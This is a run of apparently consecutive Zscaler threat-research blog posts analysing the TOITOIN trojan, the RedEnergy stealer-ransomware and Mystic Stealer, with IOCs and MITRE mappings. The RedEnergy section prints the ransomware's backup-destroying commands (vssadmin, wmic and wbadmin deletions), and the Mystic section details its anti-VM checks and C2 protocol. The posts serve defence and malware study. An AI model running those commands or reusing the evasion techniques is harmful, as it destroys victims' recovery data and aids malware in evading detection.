DLL Version: Versao_DLL(26/04/2023(TOITOIN))
Data: Date and time of execution
Figure 31 - Capture of decoded information sample transmitted to the Command & Control (C&C) server.
If the TOITOIN Trojan is unable to find the INI configuration file containing the URL to the C&C server, it resorts to sending the system information through a curl command. The encrypted data is then sent to the C&C server via a POST request using curl.
Figure 32 - Demonstrates the transmission of information to the Command & Control (C&C) server through a CURL POST request.
The screenshot below showcases the decrypted data that is sent via a curl POST request, resembling the previously observed request.
Figure 33 - Screenshot of the decrypted data that is transmitted through a CURL POST request.
Due to the unavailability of the Command and Control (C&C) servers during the analysis, the responses from the server could not be fetched.
Exploring The Open Directory
While conducting the analysis, researchers came across a decrypted URL, "191[.]252[.]203[.]222/Up/indexW.php," which was found by the InjectorDLL module. Upon exploring the endpoints associated with this URL, it was discovered that an open directory contained various stager modules, including the Loader DLL, Injection DLL, InjectorDLL Module, BypassUAC Module, and the initial Downloader Module. These binaries had been hosted on the server since March 2023.
Figure 34 - Reveals the open directory hosting the payloads on the attacker-controlled server.
Zscaler Sandbox Coverage
Figure 35 - Figure 35 presents the Zscaler Cloud Sandbox Report, which provides detailed analysis and insights into the behavior and characteristics of the analyzed malware.
The Zscaler Cloud Sandbox report includes information such as file hashes, observed behaviors, network communications, and potential indicators of compromise (IOCs). It serves as a valuable resource for understanding the malware's capabilities, allowing security analysts to take appropriate measures to protect their systems and networks. The Zscaler Cloud Sandbox Report plays a crucial role in identifying and mitigating potential threats and enhancing overall cybersecurity posture.
Win64.Downloader.Toitoin
Conclusion
In summary, the TOITOIN malware campaign targeting businesses in the Latin American region demonstrates the evolving tactics and sophistication of threat actors. Through deceptive phishing emails, intricate redirect mechanisms, and domain diversification, the threat actors successfully deliver their malicious payload. By leveraging resources such as the Amazon EC2 infrastructure and dynamically generated file names, they have shown their adaptability and persistence in compromising targeted systems.
The multi-staged infection chain observed in this campaign involves the use of custom-developed modules that employ various evasion techniques and encryption methods. The malware utilizes XOR decryption to decode configuration files and transmit system information to the command and control server. It also leverages COM Elevation Moniker for user account control bypass, ensuring the execution of malicious code with elevated privileges.
The analysis further revealed the presence of downloader modules, injector modules, and backdoors, each playing a specific role in the overall infection chain. The malware payload is injected into legitimate processes, such as explorer.exe and svchost.exe, to evade detection and maintain persistence on compromised systems.
Furthermore, the malware exhibits the ability to exfiltrate system information, including computer names, Windows versions, installed browsers, and other relevant data, to the command and control server. The communication with the CnC server occurs through encrypted channels, and in the absence of an INI configuration file, a curl POST request is utilized for data transmission.
The analysis also uncovered an open directory hosted on an attacker-controlled server, where various stager modules and payloads were found. These modules, including the Loader DLL, Injection DLL, and BypassUAC module, played critical roles in the infection chain.
Overall, this analysis highlights the importance of robust cybersecurity measures and continuous monitoring to detect and mitigate sophisticated threats like TOITOIN. Organizations should remain vigilant against evolving malware campaigns, implement strong security protocols, and regularly update their security systems to safeguard against such threats. By staying informed and proactive, businesses can effectively defend against emerging cyber threats and protect their critical assets.
One such measure that provides significant protection against malware threats like TOITOIN is the Zscaler Zero Trust Exchange. The Zscaler ThreatLabz team actively monitors and analyzes such campaigns, ensuring that customers are safeguarded against emerging threats. By leveraging the power of the Zscaler platform, organizations benefit from several key features that enhance their security posture.
Firstly, the Zscaler Zero Trust Exchange operates on a zero trust model, which means that all traffic, including email communications and web browsing, is inspected and analyzed in real-time, regardless of the user's location or device. This comprehensive inspection helps identify and block malicious emails, phishing attempts, and suspicious URLs associated with malware campaigns like TOITOIN.
Additionally, the Zscaler platform employs advanced threat intelligence and machine learning algorithms to detect and block known and unknown malware variants. The ThreatLabz team constantly updates the platform with the latest threat intelligence, ensuring that customers are protected against emerging threats as soon as they are detected.
Furthermore, Zscaler's cloud-native architecture enables rapid deployment of security updates and patches across the entire network, ensuring that customers are always equipped with the latest security defenses. This proactive approach minimizes the window of vulnerability for potential malware attacks.
Moreover, the Zscaler Zero Trust Exchange provides granular control over application access and user behavior, limiting the attack surface and reducing the risk of malware infiltration. By implementing strict access policies and enforcing least privilege principles, organizations can prevent unauthorized access and limit the spread of malware within their network.
In conclusion, while threats like the TOITOIN malware campaign continue to evolve, the Zscaler Zero Trust Exchange provides a robust and comprehensive security framework to protect organizations against such threats. With continuous monitoring, advanced threat intelligence, proactive updates, and granular access control, Zscaler helps ensure that customers stay one step ahead of emerging malware campaigns. The Zscaler ThreatLabz team's unwavering commitment to customer safety reinforces the effectiveness of the Zscaler Zero Trust Exchange in safeguarding organizations against evolving cyber threats.
MITRE ATT&CK TTP Mapping
ID
Technique Name
T1566
Phishing
T1064
Scripting
T1037
Startup Items
T1055
Process Injection
T1018
Remote System Discovery
T1082
System Information Discovery
T1083
File and Directory Discovery
T1548.002
Bypass User Account and Control
T1574.002
DLL Side-Loading
T1055.012
Process Hollowing
Indicators of Compromise (IoCs)
1. Downloader Module:
8fc3c83b88a3c65a749b27f8439a8416
2fa7c647c626901321f5decde4273633
ec2-3-89-143-150[.]compute-1[.]amazonaws[.]com/storage[.]php?e=Desktop-PC
ec2-3-82-104-156[.]compute-1[.]amazonaws[.]com/storage.php?e=Desktop-PC
http[:]//alemaoautopecas[.]com
http[:]//contatosclientes[.]services
atendimento-arquivos[.]com
arquivosclientes[.]online
fantasiacinematica[.]online
http[:]//cartolabrasil[.]com
2. Krita Loader DLL:
b7bc67f2ef833212f25ef58887d5035a
3. InjectorDLL Module
690bfd65c2738e7c1c42ca8050634166
4. ElevateInjectorDLL Module
e6c7d8d5683f338ca5c40aad462263a6
191[.]252[.]203[.]222/Up/indexW.php
5. BypassUAC Module
c35d55b8b0ddd01aa4796d1616c09a46
6. TOITOIN Trojan
7871f9a0b4b9c413a8c7085983ec9a72
http[:]//bragancasbrasil[.]com
http[:]//179[.]188[.]38[.]7
http[:]//afroblack[.]shop/CasaMoveis\ClienteD.php
Appendix I: String Decryptor - Downloader Module
Appendix II: INI Configuration Decryptor
Fri, 07 Jul 2023 08:30:02 -0700Niraj Shivtarkarhttps://www.zscaler.com/blogs/security-research/toitoin-trojan-analyzing-new-multi-stage-attack-targeting-latam-regionRansomware Redefined: RedEnergy Stealer-as-a-Ransomware attacks
https://www.zscaler.com/blogs/security-research/ransomware-redefined-redenergy-stealer-ransomware-attacks
Summary
Zscaler ThreatLabz has discovered a new malware variant, RedEnergy stealer (not to be confused with the australian company Red Energy) that fits into the hybrid Stealer-as-a-Ransomware threat category.
RedEnergy stealer uses a fake update campaign to target multiple industry verticals and possesses the ability to steal information from various browsers, enabling the exfiltration of sensitive data, while also incorporating different modules for carrying out ransomware activities.The name of the malware was kept due to the common method names observed during the analysis.
This blog provides detailed insights into the different campaigns associated with this newly identified malware, along with a technical analysis of its stealer and ransomware characteristics.
Introduction
During the cybersecurity event Botconf 2023, ThreatLabz unveiled a novel threat category called RAT-as-a-Ransomware in April this year. However, more recently, researchers have identified another hybrid category following a similar approach, now known as Stealer-as-a-Ransomware. This latest discovery of RedEnergy stealer combines silent data theft with encryption to inflict maximum harm and gain control over its victims. It targets multiple industries, including energy utilities, oil, gas, telecom, and machinery. These advancements in malware represent a notable shift and key advancements beyond traditional ransomware attacks.
The sample Stealer-as-a-Ransomware variant analyzed in this case study employs a deceptive FAKEUPDATES campaign to lure in its targets, tricking them into promptly updating their browsers. Once inside the system, this malicious variant stealthily extracts sensitive information and proceeds to encrypt the compromised files. This leaves victims vulnerable to potential data loss, exposure, or even the sale of their valuable data.
This blog offers a comprehensive analysis of various campaigns associated with this emerging threat, shedding light on its operational aspects. Additionally, ThreatLabz provides a detailed technical overview of the malware, aiding in a better understanding of its behavior and potential countermeasures.
Key Takeaways
The key takeaways from this research article are:
Discovery of RedEnergy Stealer: ThreatLabz latest research uncovers a highly sophisticated malware campaign using industries with reputable LinkedIn pages to target victims, including the Philippines Industrial Machinery Manufacturing Company and several organizations in Brazil. The attackers launch the attack on users that click to visit the website from LinkedIn for a compromised company, using multi-stage techniques and disguise the malware as browser updates to deceive users.
Stealer-as-a-Ransomware: the malware analyzed has dual capabilities as both a stealer and ransomware, representing an alarming evolution in ransomware attacks. It employs obfuscation techniques and utilizes HTTPS for command and control communication, making detection and analysis challenging.
Multi-Stage Execution: The malware operates through multiple stages, starting with the execution of disguised malicious executables. It establishes persistence, communicates with DNS servers, and downloads additional payloads from remote locations. Suspicious FTP interactions suggest potential data exfiltration and unauthorized file uploads.
Ransomware Functionality: The malware includes ransomware modules that encrypt user data with the ".FACKOFF!" extension, rendering it inaccessible until a ransom is paid. It also modifies the desktop.ini file to evade detection and modify file system folder display settings.
Deletion of Shadow Drive Data: In its final stage, the malware deletes shadow drive data and Windows backup plans, reinforcing its ransomware characteristics. It drops a batch file and a ransom note, demanding payment in exchange for file decryption.
By understanding these key takeaways, organizations can enhance their security posture and better protect themselves from RedEnergy stealer and similar types of malware campaigns.
Campaign
Zscaler recently made a significant discovery involving a new and sophisticated threat campaign named RedEnergy stealer targeting the Philippines Industrial Machinery Manufacturing Company, as well as other industries with notable LinkedIn pages. These pages typically contain essential company information and website links, making them attractive targets for cybercriminals.
Fig 1. - LinkedIn page for Philippines Industrial Machinery Manufacturing
The operating mode for this threat campaign involves a deceptive redirection technique. When a user attempts to visit the targeted company's website through their LinkedIn profile, they are unsuspectingly redirected to a malicious website. Once there, they are prompted to install a seemingly legitimate browser update, which is presented as a set of four different browser icons. However, instead of a genuine update, the unsuspecting user unwittingly downloads an executable file known as RedStealer.
Fig 2. - Malicious download site
Interestingly, regardless of which browser icon the user clicks on, they are redirected to the same URL: www[.]igrejaatos2[.]org/assets/programs/setupbrowser.exe. This URL initiates the download of a file called setupbrowser.exe, which is part of the malicious payload.
Fig 3. - Website downloading malicious payload
What makes this threat campaign even more insidious is the use of a deceptive download domain called www[.]igrejaatos2[.]org. This domain serves as a disguise, presenting itself as a ChatGpt site to lure victims into downloading a fake offline version of ChatGpt. However, upon downloading the purported ChatGpt zip file, the victim unknowingly obtains the same malicious executable mentioned earlier.
Fig 4. - Downloading domain luring users to download fake chatgpt tool
It is crucial for individuals and organizations to exercise utmost caution when accessing websites, especially those linked from LinkedIn profiles. Vigilance in verifying the authenticity of browser updates and being wary of unexpected file downloads is paramount to protect against such malicious campaigns.
Additional Campaigns
In addition to the discovery of the threat campaign targeting the Philippines Industrial Machinery Manufacturing Company, Zscaler's thorough campaign search has uncovered several other related campaigns that exploit the FAKEUPDATES tactic. These campaigns exhibit similar characteristics and techniques, indicating a broader coordinated effort by the cybercriminals behind these attacks.
One such campaign involves impersonating a prominent Brazilian telecom company. Like the previously mentioned campaign, this variant directs victims to the same webpage and initiates the download of the identical executable file, www[.]igrejaatos2[.]org/assets/programs/setupbrowser.exe. This indicates that the attackers behind this campaign are reusing their infrastructure and tactics to maximize impact and profits.
Fig 5. - Similar campaign leveraging google search
Furthermore, a well-known Brazilian cosmetics company has also fallen victim to this malicious campaign, experiencing the same type of attack which downloads the same payload. It is evident that the cybercriminals behind these campaigns are targeting organizations across various industries, leveraging their already established reputations and online presence to deceive unsuspecting users.
To gain a deeper understanding of the technical aspects of this malware, let us delve further into its analysis in the sections that follow. By examining the intricacies of the malicious code, security researchers can uncover crucial details about its behavior, functionality, and potential impact on the compromised systems. This information is essential for developing effective countermeasures and mitigating the risks associated with this ongoing threat.
Technical Analysis
The RedEnergy malware under investigation exhibits a dual functionality, acting both as a stealer and a ransomware. This .NET file, intentionally obfuscated by its author, possesses advanced capabilities to evade detection and hinder analysis. To establish communication with its command and control servers, the malware utilizes HTTPS, adding an additional layer of encryption and obfuscation.
Fig 6. - Infection chain
The execution of this malware unfolds in three distinct stages, each serving a specific purpose. Each stage is outlined in the sections below.
Stage 1: Initial Startup
Upon execution, the malicious RedEnergy executable masquerades as part of a legitimate browser update, depicted in Fig. 7 below. It cleverly disguises itself with a legitimate update from one of the various popular browsers, including Google Chrome, Microsoft Edge, Firefox, and Opera, to deceive the user. Notably, looking at the properties of the malicious executable reveals the presence of an invalid certificate, however at surface level this attack hides behind a genuine signed certificate from the user’s browser as shown by the Google example examined in Fig. 8 below. This deceptive tactic aims to instill trust and convince the victim of the authenticity of the update.
Fig 7. - Google updater executing the malicious RedEnergy binary
Fig 8. - Fake certificate
Stage 2: Dropping Files, Persistence, Outgoing Requests, Encrypted Files
Dropping Files:
In this stage, the malware drops four files onto the victim's system, shown in Fig. 9 below, precisely within the path %USERPROFILE%\AppData\Local\Temp. These dropped files consist of two temporary files and two executables, all following a similar pattern with filenames beginning with "tmp" and four randomly generated hexadecimal characters, followed by the ".exe" extension: tmp[4 random hex characters].exe. Among the executable files, one serves as the malicious payload, while the other disguises itself as the legitimate, digitally signed Google Update. The benign executable possesses the hash value 8911b376a5cd494b1ac5b84545ed2eb2 and is responsible for performing the actual update of Google Chrome, thereby further deceiving the victim. Simultaneously, the malware executes another background process, identified by the MD5 hash cb533957f70b4a7ebb4e8b896b7b656c, which represents the true malicious payload. During execution, this payload displays an inappropriate message on the victim's screen, displayed in Fig. 10 below, most likely as part of the threat actor's intent to cause distress or confusion.
Fig 9. - Dropping malicious file in temp directory
Fig 10. - Display message after executing the binary
Persistence:
Persistence is a critical aspect of malware, enabling it to maintain its presence on an infected system even after rebooting or shutting down. To achieve persistence, the malicious executable stores files in the Windows startup directory. It creates an entry within the start menu (Start Menu\Programs\Startup) and initiates an immediate reboot, ensuring that the malware is executed once the system is up and running again. This persistence mechanism guarantees that the malware remains active and continues its malicious operations even after system restarts.
Outgoing Requests:
During the analysis of the malware, researchers utilized Fakenet, a Windows malware analysis tool that simulates network activity, to gain insights into its behavior. Through Fakenet, they discovered that the malicious tmp.exe file established communication with the DNS server 2no.co, depicted in Fig. 11 below. To delve deeper into the network interactions, the widely used packet analysis tool, Wireshark, was employed. This allowed researchers to identify the specific DNS query made by the malicious tmp.exe file, providing crucial information for further investigation, as shown in Fig. 12 below. It was observed that upon establishing a connection with the DNS server, tmp.exe was expected to initiate the download of an executable file from cdn.discord. Unfortunately, during this particular analysis, the Command and Control (CnC) server was unavailable, making it impossible to obtain a sample. However, another sample resembling the final payload was discovered, which had been hosted on the same domain just two days prior to the current analysis.
Fig 11. - Malicious binary communication with CnC server
Fig 12. - Network communication seen via Wireshark
Additionally, suspicious activity involving File Transfer Protocol (FTP) was uncovered during the investigation. A user with the username "alulogrofp" successfully accessed a private system hosted by OVH, a renowned cloud computing company and one of the largest hosting providers globally. The user's credentials were authenticated, granting them access to a restricted directory, which was identified as the root directory ("/"). Notably, UTF-8 encoding was enabled for file transfers, indicating support for international character sets.
Fig 13. - FTP interaction on OVH private system
Within the FTP session, the user navigated to the "/assets/bootstrap/css" directory, following standard directory traversal practices. To ensure efficient and accurate file transfers, the transfer mode was set to binary (8-bit). Subsequently, the server entered passive mode and provided an IP address and port number, indicated by the message "Entering Passive Mode (51,68,11,192,115,132)". By combining the extracted data, the IP address 51.68.11[.]192 was obtained. Further interactions revealed that the user requested a file list using the "NLST" command, resulting in the retrieval of six matching files.
In another session, the client initiated a file retrieval operation using the "RETR" command, specifying the file path as "assets/bootstrap/css/SPP". The server acknowledged the data connection and confirmed the acceptance of the file transfer.
These FTP interactions raised concerns regarding potential data exfiltration, as well as the possibility of uploading files using the same method.
Encrypted Files:
With ransomware modules integrated into the payload, the malware proceeded to encrypt the user's data, appending the ".FACKOFF!" extension to each encrypted file, as shown in Fig. 14 below. This malicious software is specifically designed to lock the user's files, rendering them inaccessible until a ransom is paid. After the encryption process is completed, the user receives a ransom message, demanding payment in exchange for restoring access to their files. Failure to comply with the ransom demands results in the permanent loss of access to the compromised data.
Furthermore, the malicious executable alters the desktop.ini file, which contains configuration settings for the file system folders. By modifying this file, the malware can manipulate how the file system folders are displayed, potentially further concealing its presence and activities on the infected system. This alteration serves as an attempt to mislead the user and impede the detection of the malware's impact on the file system.
Fig 14. - Encrypted files with .FACKOFF! extension
Stage 3: Decryption Routine
The final stage payload is responsible for various actions, including dropping the ransom note and executing multiple commands and stealer functionalities, and for encryption it uses the RijndaelManaged algorithm. Within the payload, numerous functions are named RedEnergy, giving rise to its namesake.
In the second stage, the malware downloads the executable SystemPropertiesProtection.exe via the discord cdn. This leads to the third stage, where the malware executes a series of actions typically associated with ransomware. It begins by deleting data from the shadow drive, effectively removing any potential backups. The malware also targets Windows backup plans, further hindering the user's ability to recover their data. Additionally, a batch file is executed, and a ransom note is dropped, indicating the user's files have been encrypted. Furthermore, the malware possesses stealer capabilities, allowing it to exfiltrate the user's data.
Notably, the Config method, shown in Fig. 15 below, plays a crucial role in decrypting key information. It stores important strings related to the stealer functionality in a dictionary, depicted in Fig. 16, which is used to construct command lines for further operations.
Fig 15. - Config decryption function
Fig 16. - Malware showcasing stealer capabilities
One such decrypted command line, shown in Figure 17, modifies the boot configuration to ignore failures and disables the automatic recovery options in Windows. The payload also drops specific files in the Temp directory, as seen in Figure 18, using it as a camouflage to conceal its malicious intent. Among the files dropped, C.bin serves as a payload, while a batch file contains commands to terminate processes and perform cleanup tasks associated with the payload. Figure 19 illustrates the instructions executed by the batch file.
Fig 17. - Command line executed post decryption
Fig 18. - Dropping supporting files in temp directory
Fig 19. - Content inside batch file
Furthermore, the payload is programmed to delete all volume shadow copies (VSS), the backup catalog, and shadow copies using the Windows Management Instrumentation Command-line (WMIC). The following command lines exemplify this process:
C:\Windows\System32\cmd.exe /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
C:\Windows\System32\cmd.exe /C wbadmin delete catalog -quiet
Additionally, the payload undergoes a three-stage process to gather antivirus (AV) information. Based on this information, it generates a string that it sends to the Command and Control (CnC) server as a User Agent, as depicted in Figure 20 below. During the analysis, it was observed that the AV detected is Windows Defender. STM, RSM, and RZ likely provide additional information related to Windows Defender.
Lastly, the payload is responsible for dropping the final ransom note, read_it.txt, shown in Figure 21. This note is placed in all the folders where file encryption occurs, serving as a notification to the user that their files have been encrypted and demanding a ransom for their release.
Fig 20. - User Agent built from malicious code storing AV information
Fig 21. - Screenshot of the ransom note
Zscaler Sandbox Coverage
Zscaler's security sandbox actively detects indicators for this threat, helping Zscaler customers defend against such attacks automatically, as shown in Fig. 22 below.
Fig 22. - Zscaler sandbox report
The following threat names are detected by Zscaler's multilayered cloud security platform for identifying malicious payloads: Win32.Downloader.RedEnergyStealer
Conclusion
In conclusion, the analysis of the malware campaign targeting the Philippines Industrial Machinery Manufacturing Company, along with other industries through reputable LinkedIn pages, has revealed a highly sophisticated and multi-stage attack. This campaign involves the distribution of malware disguised as browser updates, leading unsuspecting users to malicious websites where they unknowingly download the RedStealer executable. Notably, similar campaigns have been observed targeting companies in Brazil, highlighting the broad reach of this threat.
The technical analysis of the malware has exposed its dual functionality as both a stealer and ransomware, representing a concerning evolution in the development of ransomware-like attacks. The malware employs obfuscation techniques and leverages HTTPS for command and control communication, making it challenging to detect and analyze. It operates through multiple stages, starting with the execution of the malicious executable masquerading as a browser update. Subsequently, it drops files, establishes persistence, and initiates outgoing requests to communicate with DNS servers and download additional payloads from remote locations.
The discovery of suspicious FTP interactions raises further concerns about potential data exfiltration and unauthorized file uploads. The malware's ransomware modules are responsible for encrypting user data using the ".FACKOFF!" extension, rendering it inaccessible until a ransom is paid. Additionally, the alteration of the desktop.ini file enhances the malware's ability to evade detection and manipulate file system folder display settings.
The final stage of the malware execution involves the deletion of shadow drive data and Windows backup plans, solidifying its ransomware characteristics. A batch file is executed, and a ransom note is dropped, demanding payment in exchange for decrypting the files. Furthermore, the malware exhibits stealer functionalities, enabling the theft of user data.
Overall, this analysis highlights the evolving and highly sophisticated nature of cyber threats targeting various industries and organizations. It emphasizes the critical importance of implementing robust security measures, fostering user awareness, and ensuring prompt incident response to effectively mitigate the impact of such attacks. By remaining vigilant and implementing comprehensive cybersecurity strategies, businesses can better protect themselves against these malicious campaigns and safeguard their valuable data.
Zscaler's ThreatLabz team remains dedicated to monitoring these threats and sharing their findings with the wider community. It is crucial for individuals and organizations to stay informed and take necessary precautions to defend against malware attacks. This includes regularly updating software, using strong passwords, and exercising caution when encountering suspicious emails or messages. By collectively addressing these challenges, we can enhance the security of our digital landscape and mitigate the risks associated with evolving cyber threats.
MITRE ATT&CK TTP Mapping
ID
Tactic
Technique
T1036
Defense Evasion
Masquerading
T1185
Collection
Browser Session Hijacking
T1070.006
Defense Evasion
Timestomp
T1560
Collection
Archive Collected Data
T1027
Defense Evasion
Obfuscated Files or Information
T1562.001
Defense Evasion
Disable or Modify Tools
Indicators Of Compromise (IOCs)
Main Payload
fb7883d3fd9347debf98122442c2a33e
Downloading Domain
www[.]igrejaatos2[.]org/assets/programs/setupbrowser[.]exe
Dropper Payload
cb533957f70b4a7ebb4e8b896b7b656c
Connecting Domain
2no[.]co
Final Payload
642dbe8b752b0dc735e9422d903e0e97
Wed, 21 Jun 2023 08:29:48 -0700Shatak Jainhttps://www.zscaler.com/blogs/security-research/ransomware-redefined-redenergy-stealer-ransomware-attacksMystic Stealer
https://www.zscaler.com/blogs/security-research/mystic-stealer
Key Points
Mystic Stealer is a new information stealer that was first advertised in April 2023
Mystic steals credentials from nearly 40 web browsers and more than 70 browser extensions
The malware also targets cryptocurrency wallets, Steam, and Telegram
The code is heavily obfuscated making use of polymorphic string obfuscation, hash-based import resolution, and runtime calculation of constants
Mystic implements a custom binary protocol that is encrypted with RC4
How do you know when something is in hot demand in the underground economy? The same way you do in the real world – the market becomes flooded. This is the story of information stealers today. "Stealers" are a kind of malware designed to run on an endpoint post-compromise, while their primary features center on the theft of user data. Oftentimes this is credential data, but it can be any data that may have financial value to an adversary; this includes paid online service accounts, cryptocurrency wallets, instant messenger, or email contacts lists, etc. Stealers also bridge the realms of criminal and nation-state focus. Many espionage-focused threat groups operate stealer families for pilfering information from target networks. Credential information can further increase access or penetration into an environment. Demand for compromised credentials to fuel criminal access to user accounts and target networks has resulted in a steady stream of newly developed information-stealing malware, keeping account markets stocked. With the amount of visibility we have at Zscaler, we are accustomed to encountering new threats on a daily basis. Enter Mystic Stealer, a fresh stealer lurking in the cyber sphere, noted for its data theft capabilities, obfuscation, and an encrypted binary protocol to enable it to stay under the radar and evade defenses. Together with our colleagues at InQuest, we present a deep dive technical analysis of the malware. We also share indicators from an in-depth analysis of the infrastructure footprint of deployed Mystic Stealer controllers and countermeasures for detecting the client in your environment.
Note: the content of this blog is also hosted by InQuest here.
The Data Heist Specialist
Mystic Stealer focuses on data theft, exhibiting capabilities that allow it to pilfer a wide array of information. For starters, it is designed to collect computer information such as the system hostname, user name, and GUID. It also identifies a likely system user geolocation using the locale and keyboard layout. But it doesn't stop there.
Key Mystic Stealer functions include its ability to extract data from web browsers and cryptocurrency wallets. Like many stealers, it collects auto-fill data, browsing history, arbitrary files, cookies, and information related to cryptocurrency wallets. Whether it's Bitcoin, DashCore, Exodus, or any other popular crypto wallet, Mystic Stealer has it covered. Mystic can also steal Telegram and Steam credentials.
Interestingly, the stealer does not require the integration of third-party libraries for decrypting or decoding target credentials. Some leading stealer projects download DLL files post-install to implement functionality to extract credentials from files on the local system. Instead, Mystic Stealer collects and exfiltrates information from an infected system and then sends the data to the command & control (C2) server that handles parsing. This is a different approach from many leading stealers and is likely an alternate design to keep the size of the stealer binary smaller and the intention less clear to file analyzers.
The Mystic Stealer crimeware is implemented in C for the client and Python for the control panel.
Technical Analysis
Looking at the existing releases, it seems clear that the developer of Mystic Stealer is looking to produce a stealer on par with the current trends of the malware space while attempting to focus on anti-analysis and defense evasion.
In terms of capabilities, it's a fairly standard set of functionality as seen with many stealers today. The malware collects system information which is packaged together for a check-in to the C2 server:
Keyboard layout
Locale
CPU information
Number of CPU processors
Screen dimensions
Computer name
Username
Running processes
System architecture
Operating system version
Key data theft functionality includes the ability to capture history and auto-fill data, bookmarks, cookies, and stored credentials from nearly 40 different web browsers. In addition, it collects Steam and Telegram credentials as well as data related to installed cryptocurrency wallets. The malware targets more than 70 web browser extensions for cryptocurrency theft and uses the same functionality to target two-factor authentication (2FA) applications. The approach used by Mystic Stealer is similar to what was reported for Arkei Stealer. Further details on targeted browsers, cryptocurrency plugins, and 2FA apps are available in the appendix.
Depending on a configuration provided by the C2 server, the malware will capture a screenshot of the desktop, which is exfiltrated to the C2 server.
On May 20, the Mystic Stealer seller posted updates that include loader functionality and a persistence capability to forums as shown in Figure 1. Loader refers to the ability to download and execute additional malware payloads. This is reflective of a continuing trend where loaders allow one threat actor to support the distribution of affiliate malware being loaded on compromised devices. This is already a notable risk for many organizations due to the use of malware distribution networks and initial access brokers for the distribution of high-severity payloads like ransomware. It underscores the need to take preventative steps to ensure a security posture that reduces the risk of malware delivery and footholds early on in attack campaigns.
Figure 1. MysticStealer forum post advertising v1.2 update with loader support
As previously noted, there are several anti-analysis and evasion features additionally present in Mystic Stealer:
Binary expiration. The trojan will terminate execution if the running build is older than a specified date. This is likely an execution guardrail that attempts to prevent anti-malware researchers and sandboxes that analyze the sample much later than when it was intended to be distributed or executed on victim machines. Figure 2 shows a Mystic Stealer sample that retrieves the current system time and compares the value to 1685318914 (0x6473ED02), which when converted from an epoch to a timestamp translates to Sun May 28 17:08:34 2023.
Figure 2. Example Mystic Stealer date expiration feature
Anti-virtualization. Mystic Stealer is configurable and some samples contain anti-VM features, detecting hypervisor runtime environments, and avoiding execution. This is helpful for avoiding execution in sandbox environments but it isn't always effective.
Mystic uses the CPUID assembly instruction to detect virtual environments by inspecting the result for specific values that are indicative of virtualization software. In particular, the code checks for the manufacturer ID string (with a length of 12 bytes) for the following values:
“XenVMMXenVMM” (Xen HVM)
“VMwareVMware” (VMware)
“Microsoft Hv” (Microsoft Hyper-V)
“ KVMKVMKVM “ (KVM)
“prl hyperv “ (Parallels)
“VBoxVBoxVBox” (VirtualBox)
This detection code is likely derived from Pafish.
Windows APIs imported by hash. The stealer resolves and dynamically loads Windows APIs using a custom XOR based hashing algorithm represented in the Python snippet shown below:
Note that the constant value (e.g., 0x240CE91) changes between Mystic samples. The malware walks the export tables for the following Windows DLLs and hashes each export name until a match is found:
Kernel32.dll
Advapi32.dll
Kernel32.dll
Gdiplus.dll
Crypt32.dll
User32.dll
Ws2_32.dll
Ole32.dll
Gdi32.dll
Ntdll.dll
Dynamic constant calculation. Constant values in the code are obfuscated and dynamically calculated at runtime. For example, the API hashing algorithm shown above uses the constant 0x240CE91. However, this constant does not directly exist in the code. Instead, the value 0x240CEA6 is present and the code performs an XOR operation with the value 0x37 to produce the actual constant 0x240CE91 as shown in Figure 3.
Figure 3. Example Mystic Stealer constant obfuscation technique
Encrypted binary custom protocol. The client communicates with the C2 server using a custom protocol over TCP, which we discuss in more depth later.
Polymorphic string obfuscation. We identified that the malware obfuscates strings using a library that is very similar to ADVobfuscator. The obfuscator generates code at compile time that builds strings on the stack, which are then decrypted at runtime. The obfuscation is polymorphic, and therefore, every sample will contain strings that are uniquely encrypted with simple mathematical operations such as addition, subtraction, and XOR. As a result, this technique may bypass static antivirus signatures and complicate malware reverse engineering.
The Mystic Stealer seller refers to this obfuscation as a morpher that obfuscates builds with full undetectability (FUD) in sales threads. In one forum, the seller advertised that the project's morpher enabled the bypass of SmartScreen, which members identified as a dubious claim based on the operation of obfuscators and SmartScreen. Some forum users suspected the use of an open-source obfuscator. This ended up as a point of contention in the forum, lowering the perception and trust of the project with some users.
C2 Communication
Mystic Stealer communicates with its command and control (C2) servers using a custom binary protocol over TCP.
The client sends a hello message containing a constant 4 byte value (0x946F19B5) to the C2 server.
The C2 responds with 256 bytes of binary data that is used as an RC4 key for all subsequent communications.
The client obtains the machine GUID from the registry value SOFTWARE\Microsoft\Cryptography\MachineGuid.
The client encrypts the GUID value (along with this GUID length) using RC4 and sends it to the C2 server.
The format of packets received from the server consists of a 4 byte big endian data size value followed by the data buffer. All data is encrypted with RC4.
The C2 server responds back with a binary configuration of the actions to perform (steal credentials, take screenshots, steal cryptocurrency wallets, etc). This configuration is structured by 1’s and 0’s representing whether to enable or disable a feature, respectively.
Data stolen from the infected system is labeled with specific binary tags that identify the type of information when it is sent to the C2 server.
Unlike most stealers that will harvest data in full and then exfiltrate it to a C2 server with a single request, Mystic Stealer will collect various types of information and immediately send the data to a C2 server on-the-fly without storing or writing data to the disk, which may be detected by EDR/antivirus applications.
The builder enables operators to specify up to four C2 endpoints. This is often used in crimeware to provide resiliency in case some servers are offline or blocklisted. In Mystic Stealer binaries, there are two arrays consisting of 4 DWORDs each that are encrypted with a modified XTEA-based algorithm. Thus, each sample can configure up to 4 IP addresses and ports. A Python-based implementation of the decryption algorithm for Mystic C2s is shown below:
A few generations of the C2 servers seem to utilize a default port of 16287/tcp as seen in Figure 4 of the control panel builder dialog posted in a sales thread on underground forums. We have not observed file samples where this port was utilized for the configured C2 servers. The following C2 ports have been observed in identified samples, providing some clustering by build configurations:
15555/tcp
15556/tcp
13219/tcp
Figure 4. Mystic Stealer control panel builder dialog
C2 server footprint
The stealer has been linked to multiple server-hosting IP addresses across a diverse geographic spectrum, including but not limited to registrations in France, Germany, Russia, the United States, and China. We list C2 servers identified by the hosting panel and C2 callbacks in the appendix. Large commercial hosting provider Hetzner (AS24940) accounts for nearly half of the hosts in addition to a number at OVH (AS16276). However, we also note a number of servers within the Latvian, Bulgarian and Russian hosting spheres. These include:
Aeza Group Ltd (AS210644)
GIR-AS (AS207713)
Partner-AS / LetHost LLC (AS204603)
Scalaxy B.V. (AS58061)
Sukhoi Su-57 LLC (AS46308)
WAICORE-TRANSIT (AS202973)
